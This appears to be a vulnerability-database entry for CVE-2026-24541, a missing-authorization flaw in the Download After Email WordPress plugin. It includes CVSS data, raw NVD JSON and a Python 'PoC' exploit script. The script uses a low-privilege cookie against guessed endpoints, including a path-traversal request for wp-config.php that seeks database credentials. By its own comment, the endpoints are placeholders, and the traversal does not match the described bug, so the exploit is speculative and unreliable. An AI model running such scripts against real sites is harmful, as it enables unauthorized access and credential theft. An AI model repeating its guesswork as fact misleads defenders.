Security Vulnerability Report
中文
CVE-2026-24541 CVSS 4.3 MEDIUM

CVE-2026-24541

Published: 2026-01-23 15:16:10
Last Modified: 2026-04-28 15:16:12

Description

Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download After Email: from n/a through <= 2.1.9.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Download After Email插件 <= 2.1.9(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24541 PoC - Missing Authorization in Download After Email # Affected: Download After Email Plugin <= 2.1.9 import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Assume attacker has low-privilege account (subscriber role) ATTACKER_COOKIE = "wordpress_logged_in_cookie_here" def exploit_missing_auth(): """ Exploit Missing Authorization vulnerability in Download After Email plugin. This PoC demonstrates how a low-privilege user can access admin functions. """ headers = { "Cookie": ATTACKER_COOKIE, "Content-Type": "application/x-www-form-urlencoded" } # Target the plugin's download endpoint # Replace ENDPOINT_PATH with actual vulnerable path discovered endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/download-after-email/v1/download", f"{TARGET_URL}/?action=dae_download&file=../../wp-config.php" ] print("[*] Testing CVE-2026-24541 - Missing Authorization in Download After Email") print("[*] Target: Download After Email Plugin <= 2.1.9") print("[*] Attacker privileges: Low (Subscriber)") for endpoint in endpoints: try: # Attempt to access admin-only functionality response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: # Check if sensitive data is exposed if "wp-config.php" in response.text or "DB_NAME" in response.text: print(f"[!] VULNERABLE: {endpoint}") print(f"[!] Exposed sensitive configuration data") return True elif "success" in response.text.lower() or "download" in response.text.lower(): print(f"[!] POTENTIALLY VULNERABLE: {endpoint}") print(f"[*] Response indicates unauthorized access succeeded") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] Test completed") return False def check_plugin_version(): """ Check if target is running vulnerable version of the plugin. """ url = f"{TARGET_URL}/wp-content/plugins/download-after-email/readme.txt" try: response = requests.get(url, timeout=10) if response.status_code == 200 and "2.1.9" in response.text: print("[!] Target is running version 2.1.9 (vulnerable)") return True except: pass return False if __name__ == "__main__": print("=" * 60) print("CVE-2026-24541 Exploitation Test") print("Missing Authorization - Download After Email Plugin") print("=" * 60) check_plugin_version() exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24541", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:10.350", "lastModified": "2026-04-28T15:16:11.980", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download After Email: from n/a through <= 2.1.9."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en mkscripts Download After Email download-after-email permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Download After Email: desde n/a hasta &lt;= 2.1.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}